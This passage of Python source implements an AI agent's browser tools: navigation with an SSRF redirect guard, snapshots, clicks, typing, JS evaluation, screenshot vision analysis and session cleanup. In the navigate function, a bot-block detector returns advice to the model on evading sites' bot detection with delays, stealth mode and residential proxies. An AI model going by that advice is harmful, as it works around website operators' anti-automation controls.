_maybe_start_recording(nav_session_key) 1796 1797 result = _run_browser_command(nav_session_key, "open", [url], timeout=max(_get_command_timeout(), 60)) 1798 1799 # Remember which session served this nav so snapshot/click/fill/... 1800 # on the same task_id hit it (critical when hybrid routing has both a 1801 # cloud session and a local sidecar alive concurrently). 1802 _last_active_session_key[effective_task_id] = nav_session_key 1803 1804 if result.get("success"): 1805 data = result.get("data", {}) 1806 title = data.get("title", "") 1807 final_url = data.get("url", url) 1808 1809 # Post-redirect SSRF check — if the browser followed a redirect to a 1810 # private/internal address, block the result so the model can't read 1811 # internal content via subsequent browser_snapshot calls. 1812 # Skipped for local backends (same rationale as the pre-nav check), 1813 # and for the hybrid local sidecar (we're already on a local browser 1814 # hitting a private URL by design). 1815 if ( 1816 not _is_local_backend() 1817 and not auto_local_this_nav 1818 and not _allow_private_urls() 1819 and final_url and final_url != url and not _is_safe_url(final_url) 1820 ): 1821 # Navigate away to a blank page to prevent snapshot leaks 1822 _run_browser_command(nav_session_key, "open", ["about:blank"], timeout=10) 1823 return json.dumps({ 1824 "success": False, 1825 "error": "Blocked: redirect landed on a private/internal address", 1826 }) 1827 1828 response = { 1829 "success": True, 1830 "url": final_url, 1831 "title": title 1832 } 1833 1834 # Detect common "blocked" page patterns from title/url 1835 blocked_patterns = [ 1836 "access denied", "access to this page has been denied", 1837 "blocked", "bot detected", "verification required", 1838 "please verify", "are you a robot", "captcha", 1839 "cloudflare", "ddos protection", "checking your browser", 1840 "just a moment", "attention required" 1841 ] 1842 title_lower = title.lower() 1843 1844 if any(pattern in title_lower for pattern in blocked_patterns): 1845 response["bot_detection_warning"] = ( 1846 f"Page title '{title}' suggests bot detection. The site may have blocked this request. " 1847 "Options: 1) Try adding delays between actions, 2) Access different pages first, " 1848 "3) Enable advanced stealth (BROWSERBASE_ADVANCED_STEALTH=true, requires Scale plan), " 1849 "4) Some sites have very aggressive bot detection that may be unavoidable." 1850 ) 1851 1852 # Include feature info on first navigation so model knows what's active 1853 if is_first_nav and "features" in session_info: 1854 features = session_info["features"] 1855 active_features = [k for k, v in features.items() if v] 1856 if not features.get("proxies"): 1857 response["stealth_warning"] = ( 1858 "Running WITHOUT residential proxies. Bot detection may be more aggressive. " 1859 "Consider upgrading Browserbase plan for proxy support." 1860 ) 1861 response["stealth_features"] = active_features 1862 1863 # Auto-take a compact snapshot so the model can act immediately 1864 # without a separate browser_snapshot call. 1865 try: 1866 snap_result = _run_browser_command(nav_session_key, "snapshot", ["-c"]) 1867 if snap_result.get("success"): 1868 snap_data = snap_result.get("data", {}) 1869 snapshot_text = snap_data.get("snapshot", "") 1870 refs = snap_data.get("refs", {}) 1871 if len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD: 1872 snapshot_text = _truncate_snapshot(snapshot_text) 1873 response["snapshot"] = snapshot_text 1874 response["element_count"] = len(refs) if refs else 0 1875 except Exception as e: 1876 logger.debug("Auto-snapshot after navigate failed: %s", e) 1877 1878 return json.dumps(response, ensure_ascii=False) 1879 else: 1880 return json.dumps({ 1881 "success": False, 1882 "error": result.get("error", "Navigation failed") 1883 }, ensure_ascii=False) 1884 1885 1886 def browser_snapshot( 1887 full: bool = False, 1888 task_id: Optional[str] = None, 1889 user_task: Optional[str] = None 1890 ) -> str: 1891 """ 1892 Get a text-based snapshot of the current page's accessibility tree. 1893 1894 Args: 1895 full: If True, return complete snapshot. If False, return compact view. 1896 task_id: Task identifier for session isolation 1897 user_task: The user's current task (for task-aware extraction) 1898 1899 Returns: 1900 JSON string with page snapshot 1901 """ 1902 if _is_camofox_mode(): 1903 from tools.browser_camofox import camofox_snapshot 1904 return camofox_snapshot(full, task_id, user_task) 1905 1906 effective_task_id = _last_session_key(task_id or "default") 1907 1908 # Build command args based on full flag 1909 args = [] 1910 if not full: 1911 args.extend(["-c"]) # Compact mode 1912 1913 result = _run_browser_command(effective_task_id, "snapshot", args) 1914 1915 if result.get("success"): 1916 data = result.get("data", {}) 1917 snapshot_text = data.get("snapshot", "") 1918 refs = data.get("refs", {}) 1919 1920 # Check if snapshot needs summarization 1921 if len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD and user_task: 1922 snapshot_text = _extract_relevant_content(snapshot_text, user_task) 1923 elif len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD: 1924 snapshot_text = _truncate_snapshot(snapshot_text) 1925 1926 response = { 1927 "success": True, 1928 "snapshot": snapshot_text, 1929 "element_count": len(refs) if refs else 0 1930 } 1931 1932 # Merge supervisor state (pending dialogs + frame tree) when a CDP 1933 # supervisor is attached to this task. No-op otherwise. See 1934 # website/docs/developer-guide/browser-supervisor.md. 1935 try: 1936 from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found] 1937 _supervisor = SUPERVISOR_REGISTRY.get(effective_task_id) 1938 if _supervisor is not None: 1939 _sv_snap = _supervisor.snapshot() 1940 if _sv_snap.active: 1941 response.update(_sv_snap.to_dict()) 1942 except Exception as _sv_exc: 1943 logger.debug("supervisor snapshot merge failed: %s", _sv_exc) 1944 1945 return json.dumps(response, ensure_ascii=False) 1946 else: 1947 return json.dumps({ 1948 "success": False, 1949 "error": result.get("error", "Failed to get snapshot") 1950 }, ensure_ascii=False) 1951 1952 1953 def browser_click(ref: str, task_id: Optional[str] = None) -> str: 1954 """ 1955 Click on an element. 1956 1957 Args: 1958 ref: Element reference (e.g., "@e5") 1959 task_id: Task identifier for session isolation 1960 1961 Returns: 1962 JSON string with click result 1963 """ 1964 if _is_camofox_mode(): 1965 from tools.browser_camofox import camofox_click 1966 return camofox_click(ref, task_id) 1967 1968 effective_task_id = _last_session_key(task_id or "default") 1969 1970 # Ensure ref starts with @ 1971 if not ref.startswith("@"): 1972 ref = f"@{ref}" 1973 1974 result = _run_browser_command(effective_task_id, "click", [ref]) 1975 1976 if result.get("success"): 1977 return json.dumps({ 1978 "success": True, 1979 "clicked": ref 1980 }, ensure_ascii=False) 1981 else: 1982 return json.dumps({ 1983 "success": False, 1984 "error": result.get("error", f"Failed to click {ref}") 1985 }, ensure_ascii=False) 1986 1987 1988 def browser_type(ref: str, text: str, task_id: Optional[str] = None) -> str: 1989 """ 1990 Type text into an input field. 1991 1992 Args: 1993 ref: Element reference (e.g., "@e3") 1994 text: Text to type 1995 task_id: Task identifier for session isolation 1996 1997 Returns: 1998 JSON string with type result 1999 """ 2000 if _is_camofox_mode(): 2001 from tools.browser_camofox import camofox_type 2002 return camofox_type(ref, text, task_id) 2003 2004 effective_task_id = _last_session_key(task_id or "default") 2005 2006 # Ensure ref starts with @ 2007 if not ref.startswith("@"): 2008 ref = f"@{ref}" 2009 2010 # Use fill command (clears then types) 2011 result = _run_browser_command(effective_task_id, "fill", [ref, text]) 2012 2013 if result.get("success"): 2014 return json.dumps({ 2015 "success": True, 2016 "typed": text, 2017 "element": ref 2018 }, ensure_ascii=False) 2019 else: 2020 return json.dumps({ 2021 "success": False, 2022 "error": result.get("error", f"Failed to type into {ref}") 2023 }, ensure_ascii=False) 2024 2025 2026 def browser_scroll(direction: str, task_id: Optional[str] = None) -> str: 2027 """ 2028 Scroll the page. 2029 2030 Args: 2031 direction: "up" or "down" 2032 task_id: Task identifier for session isolation 2033 2034 Returns: 2035 JSON string with scroll result 2036 """ 2037 # Validate direction 2038 if direction not in ["up", "down"]: 2039 return json.dumps({ 2040 "success": False, 2041 "error": f"Invalid direction '{direction}'. Use 'up' or 'down'." 2042 }, ensure_ascii=False) 2043 2044 # Single scroll with pixel amount instead of 5x subprocess calls. 2045 # agent-browser supports: agent-browser scroll down 500 2046 # ~500px is roughly half a viewport of travel. 2047 _SCROLL_PIXELS = 500 2048 2049 if _is_camofox_mode(): 2050 from tools.browser_camofox import camofox_scroll 2051 # Camofox REST API doesn't support pixel args; use repeated calls 2052 _SCROLL_REPEATS = 5 2053 result = None 2054 for _ in range(_SCROLL_REPEATS): 2055 result = camofox_scroll(direction, task_id) 2056 return result 2057 2058 effective_task_id = _last_session_key(task_id or "default") 2059 2060 result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)]) 2061 if not result.get("success"): 2062 return json.dumps({ 2063 "success": False, 2064 "error": result.get("error", f"Failed to scroll {direction}") 2065 }, ensure_ascii=False) 2066 2067 return json.dumps({ 2068 "success": True, 2069 "scrolled": direction 2070 }, ensure_ascii=False) 2071 2072 2073 def browser_back(task_id: Optional[str] = None) -> str: 2074 """ 2075 Navigate back in browser history. 2076 2077 Args: 2078 task_id: Task identifier for session isolation 2079 2080 Returns: 2081 JSON string with navigation result 2082 """ 2083 if _is_camofox_mode(): 2084 from tools.browser_camofox import camofox_back 2085 return camofox_back(task_id) 2086 2087 effective_task_id = _last_session_key(task_id or "default") 2088 result = _run_browser_command(effective_task_id, "back", []) 2089 2090 if result.get("success"): 2091 data = result.get("data", {}) 2092 return json.dumps({ 2093 "success": True, 2094 "url": data.get("url", "") 2095 }, ensure_ascii=False) 2096 else: 2097 return json.dumps({ 2098 "success": False, 2099 "error": result.get("error", "Failed to go back") 2100 }, ensure_ascii=False) 2101 2102 2103 def browser_press(key: str, task_id: Optional[str] = None) -> str: 2104 """ 2105 Press a keyboard key. 2106 2107 Args: 2108 key: Key to press (e.g., "Enter", "Tab") 2109 task_id: Task identifier for session isolation 2110 2111 Returns: 2112 JSON string with key press result 2113 """ 2114 if _is_camofox_mode(): 2115 from tools.browser_camofox import camofox_press 2116 return camofox_press(key, task_id) 2117 2118 effective_task_id = _last_session_key(task_id or "default") 2119 result = _run_browser_command(effective_task_id, "press", [key]) 2120 2121 if result.get("success"): 2122 return json.dumps({ 2123 "success": True, 2124 "pressed": key 2125 }, ensure_ascii=False) 2126 else: 2127 return json.dumps({ 2128 "success": False, 2129 "error": result.get("error", f"Failed to press {key}") 2130 }, ensure_ascii=False) 2131 2132 2133 2134 2135 2136 def browser_console(clear: bool = False, expression: Optional[str] = None, task_id: Optional[str] = None) -> str: 2137 """Get browser console messages and JavaScript errors, or evaluate JS in the page. 2138 2139 When ``expression`` is provided, evaluates JavaScript in the page context 2140 (like the DevTools console) and returns the result. Otherwise returns 2141 console output (log/warn/error/info) and uncaught exceptions. 2142 2143 Args: 2144 clear: If True, clear the message/error buffers after reading 2145 expression: JavaScript expression to evaluate in the page context 2146 task_id: Task identifier for session isolation 2147 2148 Returns: 2149 JSON string with console messages/errors, or eval result 2150 """ 2151 # --- JS evaluation mode --- 2152 if expression is not None: 2153 return _browser_eval(expression, task_id) 2154 2155 # --- Console output mode (original behaviour) --- 2156 if _is_camofox_mode(): 2157 from tools.browser_camofox import camofox_console 2158 return camofox_console(clear, task_id) 2159 2160 effective_task_id = _last_session_key(task_id or "default") 2161 2162 console_args = ["--clear"] if clear else [] 2163 error_args = ["--clear"] if clear else [] 2164 2165 console_result = _run_browser_command(effective_task_id, "console", console_args) 2166 errors_result = _run_browser_command(effective_task_id, "errors", error_args) 2167 2168 messages = [] 2169 if console_result.get("success"): 2170 for msg in console_result.get("data", {}).get("messages", []): 2171 messages.append({ 2172 "type": msg.get("type", "log"), 2173 "text": msg.get("text", ""), 2174 "source": "console", 2175 }) 2176 2177 errors = [] 2178 if errors_result.get("success"): 2179 for err in errors_result.get("data", {}).get("errors", []): 2180 errors.append({ 2181 "message": err.get("message", ""), 2182 "source": "exception", 2183 }) 2184 2185 return json.dumps({ 2186 "success": True, 2187 "console_messages": messages, 2188 "js_errors": errors, 2189 "total_messages": len(messages), 2190 "total_errors": len(errors), 2191 }, ensure_ascii=False) 2192 2193 2194 def _browser_eval(expression: str, task_id: Optional[str] = None) -> str: 2195 """Evaluate a JavaScript expression in the page context and return the result.""" 2196 if _is_camofox_mode(): 2197 return _camofox_eval(expression, task_id) 2198 2199 effective_task_id = _last_session_key(task_id or "default") 2200 result = _run_browser_command(effective_task_id, "eval", [expression]) 2201 2202 if not result.get("success"): 2203 err = result.get("error", "eval failed") 2204 # Detect backend capability gaps and give the model a clear signal 2205 if any(hint in err.lower() for hint in ("unknown command", "not supported", "not found", "no such command")): 2206 return json.dumps({ 2207 "success": False, 2208 "error": f"JavaScript evaluation is not supported by this browser backend. {err}", 2209 }) 2210 return json.dumps({ 2211 "success": False, 2212 "error": err, 2213 }) 2214 2215 data = result.get("data", {}) 2216 raw_result = data.get("result") 2217 2218 # The eval command returns the JS result as a string. If the string 2219 # is valid JSON, parse it so the model gets structured data. 2220 parsed = raw_result 2221 if isinstance(raw_result, str): 2222 try: 2223 parsed = json.loads(raw_result) 2224 except (json.JSONDecodeError, ValueError): 2225 pass # keep as string 2226 2227 return json.dumps({ 2228 "success": True, 2229 "result": parsed, 2230 "result_type": type(parsed).__name__, 2231 }, ensure_ascii=False, default=str) 2232 2233 2234 def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str: 2235 """Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available).""" 2236 from tools.browser_camofox import _ensure_tab, _post 2237 try: 2238 tab_info = _ensure_tab(task_id or "default") 2239 tab_id = tab_info.get("tab_id") or tab_info.get("id") 2240 resp = _post(f"/tabs/{tab_id}/evaluate", body={"expression": expression, "userId": tab_info["user_id"]}) 2241 2242 # Camofox returns the result in a JSON envelope 2243 raw_result = resp.get("result") if isinstance(resp, dict) else resp 2244 parsed = raw_result 2245 if isinstance(raw_result, str): 2246 try: 2247 parsed = json.loads(raw_result) 2248 except (json.JSONDecodeError, ValueError): 2249 pass 2250 2251 return json.dumps({ 2252 "success": True, 2253 "result": parsed, 2254 "result_type": type(parsed).__name__, 2255 }, ensure_ascii=False, default=str) 2256 except Exception as e: 2257 error_msg = str(e) 2258 # Graceful degradation — server may not support eval 2259 if any(code in error_msg for code in ("404", "405", "501")): 2260 return json.dumps({ 2261 "success": False, 2262 "error": "JavaScript evaluation is not supported by this Camofox server. " 2263 "Use browser_snapshot or browser_vision to inspect page state.", 2264 }) 2265 return tool_error(error_msg, success=False) 2266 2267 2268 def _maybe_start_recording(task_id: str): 2269 """Start recording if browser.record_sessions is enabled in config.""" 2270 with _cleanup_lock: 2271 if task_id in _recording_sessions: 2272 return 2273 try: 2274 from hermes_cli.config import read_raw_config 2275 hermes_home = get_hermes_home() 2276 cfg = read_raw_config() 2277 record_enabled = cfg_get(cfg, "browser", "record_sessions", default=False) 2278 2279 if not record_enabled: 2280 return 2281 2282 recordings_dir = hermes_home / "browser_recordings" 2283 recordings_dir.mkdir(parents=True, exist_ok=True) 2284 _cleanup_old_recordings(max_age_hours=72) 2285 2286 timestamp = time.strftime("%Y%m%d_%H%M%S") 2287 recording_path = recordings_dir / f"session_{timestamp}_{task_id[:16]}.webm" 2288 2289 result = _run_browser_command(task_id, "record", ["start", str(recording_path)]) 2290 if result.get("success"): 2291 with _cleanup_lock: 2292 _recording_sessions.add(task_id) 2293 logger.info("Auto-recording browser session %s to %s", task_id, recording_path) 2294 else: 2295 logger.debug("Could not start auto-recording: %s", result.get("error")) 2296 except Exception as e: 2297 logger.debug("Auto-recording setup failed: %s", e) 2298 2299 2300 def _maybe_stop_recording(task_id: str): 2301 """Stop recording if one is active for this session.""" 2302 with _cleanup_lock: 2303 if task_id not in _recording_sessions: 2304 return 2305 try: 2306 result = _run_browser_command(task_id, "record", ["stop"]) 2307 if result.get("success"): 2308 path = result.get("data", {}).get("path", "") 2309 logger.info("Saved browser recording for session %s: %s", task_id, path) 2310 except Exception as e: 2311 logger.debug("Could not stop recording for %s: %s", task_id, e) 2312 finally: 2313 with _cleanup_lock: 2314 _recording_sessions.discard(task_id) 2315 2316 2317 def browser_get_images(task_id: Optional[str] = None) -> str: 2318 """ 2319 Get all images on the current page. 2320 2321 Args: 2322 task_id: Task identifier for session isolation 2323 2324 Returns: 2325 JSON string with list of images (src and alt) 2326 """ 2327 if _is_camofox_mode(): 2328 from tools.browser_camofox import camofox_get_images 2329 return camofox_get_images(task_id) 2330 2331 effective_task_id = _last_session_key(task_id or "default") 2332 2333 # Use eval to run JavaScript that extracts images 2334 js_code = """JSON.stringify( 2335 [...document.images].map(img => ({ 2336 src: img.src, 2337 alt: img.alt || '', 2338 width: img.naturalWidth, 2339 height: img.naturalHeight 2340 })).filter(img => img.src && !img.src.startsWith('data:')) 2341 )""" 2342 2343 result = _run_browser_command(effective_task_id, "eval", [js_code]) 2344 2345 if result.get("success"): 2346 data = result.get("data", {}) 2347 raw_result = data.get("result", "[]") 2348 2349 try: 2350 # Parse the JSON string returned by JavaScript 2351 if isinstance(raw_result, str): 2352 images = json.loads(raw_result) 2353 else: 2354 images = raw_result 2355 2356 return json.dumps({ 2357 "success": True, 2358 "images": images, 2359 "count": len(images) 2360 }, ensure_ascii=False) 2361 except json.JSONDecodeError: 2362 return json.dumps({ 2363 "success": True, 2364 "images": [], 2365 "count": 0, 2366 "warning": "Could not parse image data" 2367 }, ensure_ascii=False) 2368 else: 2369 return json.dumps({ 2370 "success": False, 2371 "error": result.get("error", "Failed to get images") 2372 }, ensure_ascii=False) 2373 2374 2375 def browser_vision(question: str, annotate: bool = False, task_id: Optional[str] = None) -> str: 2376 """ 2377 Take a screenshot of the current page and analyze it with vision AI. 2378 2379 This tool captures what's visually displayed in the browser and sends it 2380 to Gemini for analysis. Useful for understanding visual content that the 2381 text-based snapshot may not capture (CAPTCHAs, verification challenges, 2382 images, complex layouts, etc.). 2383 2384 The screenshot is saved persistently and its file path is returned alongside 2385 the analysis, so it can be shared with users via MEDIA:<path> in the response. 2386 2387 Args: 2388 question: What you want to know about the page visually 2389 annotate: If True, overlay numbered [N] labels on interactive elements 2390 task_id: Task identifier for session isolation 2391 2392 Returns: 2393 JSON string with vision analysis results and screenshot_path 2394 """ 2395 if _is_camofox_mode(): 2396 from tools.browser_camofox import camofox_vision 2397 return camofox_vision(question, annotate, task_id) 2398 2399 import base64 2400 import uuid as uuid_mod 2401 effective_task_id = _last_session_key(task_id or "default") 2402 2403 # Save screenshot to persistent location so it can be shared with users 2404 from hermes_constants import get_hermes_dir 2405 screenshots_dir = get_hermes_dir("cache/screenshots", "browser_screenshots") 2406 screenshot_path = screenshots_dir / f"browser_screenshot_{uuid_mod.uuid4().hex}.png" 2407 2408 try: 2409 screenshots_dir.mkdir(parents=True, exist_ok=True) 2410 2411 # Prune old screenshots (older than 24 hours) to prevent unbounded disk growth 2412 _cleanup_old_screenshots(screenshots_dir, max_age_hours=24) 2413 2414 # Take screenshot using agent-browser 2415 screenshot_args = [] 2416 if annotate: 2417 screenshot_args.append("--annotate") 2418 screenshot_args.append("--full") 2419 screenshot_args.append(str(screenshot_path)) 2420 result = _run_browser_command( 2421 effective_task_id, 2422 "screenshot", 2423 screenshot_args, 2424 ) 2425 2426 if not result.get("success"): 2427 error_detail = result.get("error", "Unknown error") 2428 _cp = _get_cloud_provider() 2429 mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})" 2430 return json.dumps({ 2431 "success": False, 2432 "error": f"Failed to take screenshot ({mode} mode): {error_detail}" 2433 }, ensure_ascii=False) 2434 2435 actual_screenshot_path = result.get("data", {}).get("path") 2436 if actual_screenshot_path: 2437 screenshot_path = Path(actual_screenshot_path) 2438 2439 # Check if screenshot file was created 2440 if not screenshot_path.exists(): 2441 _cp = _get_cloud_provider() 2442 mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})" 2443 return json.dumps({ 2444 "success": False, 2445 "error": ( 2446 f"Screenshot file was not created at {screenshot_path} ({mode} mode). " 2447 f"This may indicate a socket path issue (macOS /var/folders/), " 2448 f"a missing Chromium install ('agent-browser install'), " 2449 f"or a stale daemon process." 2450 ), 2451 }, ensure_ascii=False) 2452 2453 # Convert screenshot to base64 at full resolution. 2454 _screenshot_bytes = screenshot_path.read_bytes() 2455 _screenshot_b64 = base64.b64encode(_screenshot_bytes).decode("ascii") 2456 data_url = f"data:image/png;base64,{_screenshot_b64}" 2457 2458 vision_prompt = ( 2459 f"You are analyzing a screenshot of a web browser.\n\n" 2460 f"User's question: {question}\n\n" 2461 f"Provide a detailed and helpful answer based on what you see in the screenshot. " 2462 f"If there are interactive elements, describe them. If there are verification challenges " 2463 f"or CAPTCHAs, describe what type they are and what action might be needed. " 2464 f"Focus on answering the user's specific question." 2465 ) 2466 2467 # Use the centralized LLM router 2468 vision_model = _get_vision_model() 2469 logger.debug("browser_vision: analysing screenshot (%d bytes)", 2470 len(_screenshot_bytes)) 2471 2472 # Read vision timeout/temperature from config (auxiliary.vision.*). 2473 # Local vision models (llama.cpp, ollama) can take well over 30s for 2474 # screenshot analysis, so the default timeout must be generous. 2475 vision_timeout = 120.0 2476 vision_temperature = 0.1 2477 try: 2478 from hermes_cli.config import load_config 2479 _cfg = load_config() 2480 _vision_cfg = cfg_get(_cfg, "auxiliary", "vision", default={}) 2481 _vt = _vision_cfg.get("timeout") 2482 if _vt is not None: 2483 vision_timeout = float(_vt) 2484 _vtemp = _vision_cfg.get("temperature") 2485 if _vtemp is not None: 2486 vision_temperature = float(_vtemp) 2487 except Exception: 2488 pass 2489 2490 call_kwargs = { 2491 "task": "vision", 2492 "messages": [ 2493 { 2494 "role": "user", 2495 "content": [ 2496 {"type": "text", "text": vision_prompt}, 2497 {"type": "image_url", "image_url": {"url": data_url}}, 2498 ], 2499 } 2500 ], 2501 "max_tokens": 2000, 2502 "temperature": vision_temperature, 2503 "timeout": vision_timeout, 2504 } 2505 if vision_model: 2506 call_kwargs["model"] = vision_model 2507 # Try full-size screenshot; on size-related rejection, downscale and retry. 2508 try: 2509 response = call_llm(**call_kwargs) 2510 except Exception as _api_err: 2511 from tools.vision_tools import ( 2512 _is_image_size_error, _resize_image_for_vision, _RESIZE_TARGET_BYTES, 2513 ) 2514 if (_is_image_size_error(_api_err) 2515 and len(data_url) > _RESIZE_TARGET_BYTES): 2516 logger.info( 2517 "Vision API rejected screenshot (%.1f MB); " 2518 "auto-resizing to ~%.0f MB and retrying...", 2519 len(data_url) / (1024 * 1024), 2520 _RESIZE_TARGET_BYTES / (1024 * 1024), 2521 ) 2522 data_url = _resize_image_for_vision( 2523 screenshot_path, mime_type="image/png") 2524 call_kwargs["messages"][0]["content"][1]["image_url"]["url"] = data_url 2525 response = call_llm(**call_kwargs) 2526 else: 2527 raise 2528 2529 analysis = (response.choices[0].message.content or "").strip() 2530 # Redact secrets the vision LLM may have read from the screenshot. 2531 from agent.redact import redact_sensitive_text 2532 analysis = redact_sensitive_text(analysis) 2533 response_data = { 2534 "success": True, 2535 "analysis": analysis or "Vision analysis returned no content.", 2536 "screenshot_path": str(screenshot_path), 2537 } 2538 # Include annotation data if annotated screenshot was taken 2539 if annotate and result.get("data", {}).get("annotations"): 2540 response_data["annotations"] = result["data"]["annotations"] 2541 return json.dumps(response_data, ensure_ascii=False) 2542 2543 except Exception as e: 2544 # Keep the screenshot if it was captured successfully — the failure is 2545 # in the LLM vision analysis, not the capture. Deleting a valid 2546 # screenshot loses evidence the user might need. The 24-hour cleanup 2547 # in _cleanup_old_screenshots prevents unbounded disk growth. 2548 logger.warning("browser_vision failed: %s", e, exc_info=True) 2549 error_info = {"success": False, "error": f"Error during vision analysis: {str(e)}"} 2550 if screenshot_path.exists(): 2551 error_info["screenshot_path"] = str(screenshot_path) 2552 error_info["note"] = "Screenshot was captured but vision analysis failed. You can still share it via MEDIA:<path>." 2553 return json.dumps(error_info, ensure_ascii=False) 2554 2555 2556 def _cleanup_old_screenshots(screenshots_dir, max_age_hours=24): 2557 """Remove browser screenshots older than max_age_hours to prevent disk bloat. 2558 2559 Throttled to run at most once per hour per directory to avoid repeated 2560 scans on screenshot-heavy workflows. 2561 """ 2562 key = str(screenshots_dir) 2563 now = time.time() 2564 if now - _last_screenshot_cleanup_by_dir.get(key, 0.0) < 3600: 2565 return 2566 _last_screenshot_cleanup_by_dir[key] = now 2567 2568 try: 2569 cutoff = time.time() - (max_age_hours * 3600) 2570 for f in screenshots_dir.glob("browser_screenshot_*.png"): 2571 try: 2572 if f.stat().st_mtime < cutoff: 2573 f.unlink() 2574 except Exception as e: 2575 logger.debug("Failed to clean old screenshot %s: %s", f, e) 2576 except Exception as e: 2577 logger.debug("Screenshot cleanup error (non-critical): %s", e) 2578 2579 2580 def _cleanup_old_recordings(max_age_hours=72): 2581 """Remove browser recordings older than max_age_hours to prevent disk bloat.""" 2582 try: 2583 hermes_home = get_hermes_home() 2584 recordings_dir = hermes_home / "browser_recordings" 2585 if not recordings_dir.exists(): 2586 return 2587 cutoff = time.time() - (max_age_hours * 3600) 2588 for f in recordings_dir.glob("session_*.webm"): 2589 try: 2590 if f.stat().st_mtime < cutoff: 2591 f.unlink() 2592 except Exception as e: 2593 logger.debug("Failed to clean old recording %s: %s", f, e) 2594 except Exception as e: 2595 logger.debug("Recording cleanup error (non-critical): %s", e) 2596 2597 2598 # ============================================================================ 2599 # Cleanup and Management Functions 2600 # ============================================================================ 2601 2602 def cleanup_browser(task_id: Optional[str] = None) -> None: 2603 """ 2604 Clean up browser session(s) for a task. 2605 2606 Called automatically when a task completes or when inactivity timeout is reached. 2607 Closes both the agent-browser/Browserbase session and Camofox sessions. 2608 2609 When ``task_id`` is a bare task identifier (no ``::local`` suffix), reaps 2610 BOTH the cloud/primary session AND any hybrid-routing local sidecar that 2611 may have been spawned for LAN/localhost URLs in the same task. When 2612 ``task_id`` already carries a ``::local`` suffix (called from the inactivity 2613 cleanup loop against a specific session key), reaps only that one. 2614 2615 Args: 2616 task_id: Task identifier (or explicit session key) 2617 """ 2618 if task_id is None: 2619 task_id = "default" 2620 2621 # Expand to the full set of session keys to reap. For a bare task_id 2622 # that includes the cloud/primary key + the local sidecar if one exists. 2623 if _is_local_sidecar_key(task_id): 2624 session_keys = [task_id] 2625 bare_task_id = task_id[: -len(_LOCAL_SUFFIX)] 2626 else: 2627 session_keys = [task_id] 2628 sidecar_key = f"{task_id}{_LOCAL_SUFFIX}" 2629 with _cleanup_lock: 2630 if sidecar_key in _active_sessions: 2631 session_keys.append(sidecar_key) 2632 bare_task_id = task_id 2633 2634 for session_key in session_keys: 2635 _cleanup_single_browser_session(session_key) 2636 2637 # Drop the last-active pointer only when the bare task is being cleaned 2638 # (i.e. not when we're only reaping a sidecar mid-task). 2639 if not _is_local_sidecar_key(task_id): 2640 _last_active_session_key.pop(bare_task_id, None) 2641 2642 2643 def _cleanup_single_browser_session(task_id: str) -> None: 2644 """Internal: reap a single browser session by its exact session key.""" 2645 # Stop the CDP supervisor for this task FIRST so we close our WebSocket 2646 # before the backend tears down the underlying CDP endpoint. 2647 _stop_cdp_supervisor(task_id) 2648 2649 # Also clean up Camofox session if running in Camofox mode. 2650 # Skip full close when managed persistence is enabled — the browser 2651 # profile (and its session cookies) must survive across agent tasks. 2652 # The inactivity reaper still frees idle resources. 2653 if _is_camofox_mode(): 2654 try: 2655 from tools.browser_camofox import camofox_close, camofox_soft_cleanup 2656 if not camofox_soft_cleanup(task_id): 2657 camofox_close(task_id) 2658 except Exception as e: 2659 logger.debug("Camofox cleanup for task %s: %s", task_id, e) 2660 2661 logger.debug("cleanup_browser called for task_id: %s", task_id) 2662 logger.debug("Active sessions: %s", list(_active_sessions.keys())) 2663 2664 # Check if session exists (under lock), but don't remove yet - 2665 # _run_browser_command needs it to build the close command. 2666 with _cleanup_lock: 2667 session_info = _active_sessions.get(task_id) 2668 2669 if session_info: 2670 bb_session_id = session_info.get("bb_session_id", "unknown") 2671 logger.debug("Found session for task %s: bb_session_id=%s", task_id, bb_session_id) 2672 2673 # Stop auto-recording before closing (saves the file) 2674 _maybe_stop_recording(task_id) 2675 2676 # Try to close via agent-browser first (needs session in _active_sessions) 2677 try: 2678 _run_browser_command(task_id, "close", [], timeout=10) 2679 logger.debug("agent-browser close command completed for task %s", task_id) 2680 except Exception as e: 2681 logger.warning("agent-browser close failed for task %s: %s", task_id, e) 2682 2683 # Now remove from tracking under lock 2684 with _cleanup_lock: 2685 _active_sessions.pop(task_id, None) 2686 _session_last_activity.pop(task_id, None) 2687 2688 # Cloud mode: close the cloud browser session via provider API. 2689 # Local sidecars have bb_session_id=None so this no-ops for them. 2690 if bb_session_id: 2691 provider = _get_cloud_provider() 2692 if provider is not None: 2693 try: 2694 provider.close_session(bb_session_id) 2695 except Exception as e: 2696 logger.warning("Could not close cloud browser session: %s", e) 2697 2698 # Kill the daemon process and clean up socket directory 2699 session_name = session_info.get("session_name", "") 2700 if session_name: 2701 socket_dir = os.path.join(_socket_safe_tmpdir(), f"agent-browser-{session_name}") 2702 if os.path.exists(socket_dir): 2703 # agent-browser writes {session}.pid in the socket dir 2704 pid_file = os.path.join(socket_dir, f"{session_name}.pid") 2705 if os.path.isfile(pid_file): 2706 try: 2707 daemon_pid = int(Path(pid_file).read_text().strip()) 2708 os.kill(daemon_pid, signal.SIGTERM) 2709 logger.debug("Killed daemon pid %s for %s", daemon_pid, session_name) 2710 except (ProcessLookupError, ValueError, PermissionError, OSError): 2711 logger.debug("Could not kill daemon pid for %s (already dead or inaccessible)", session_name) 2712 shutil.rmtree(socket_dir, ignore_errors=True) 2713 2714 logger.debug("Removed task %s from active sessions", task_id) 2715 else: 2716 logger.debug("No active session found for task_id: %s", task_id) 2717 2718 2719 def cleanup_all_browsers() -> None: 2720 """ 2721 Clean up all active browser sessions. 2722 2723 Useful for cleanup on shutdown. 2724 """ 2725 with _cleanup_lock: 2726 task_ids = list(_active_sessions.keys()) 2727 for task_id in task_ids: 2728 cleanup_browser(task_id) 2729 2730 # Tear down CDP supervisors for all tasks so background threads exit. 2731 try: 2732 from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found] 2733 SUPERVISOR_REGISTRY.stop_all() 2734 except Exception: 2735 pass 2736 2737 # Reset cached lookups so they are re-evaluated on next use. 2738 global _cached_agent_browser, 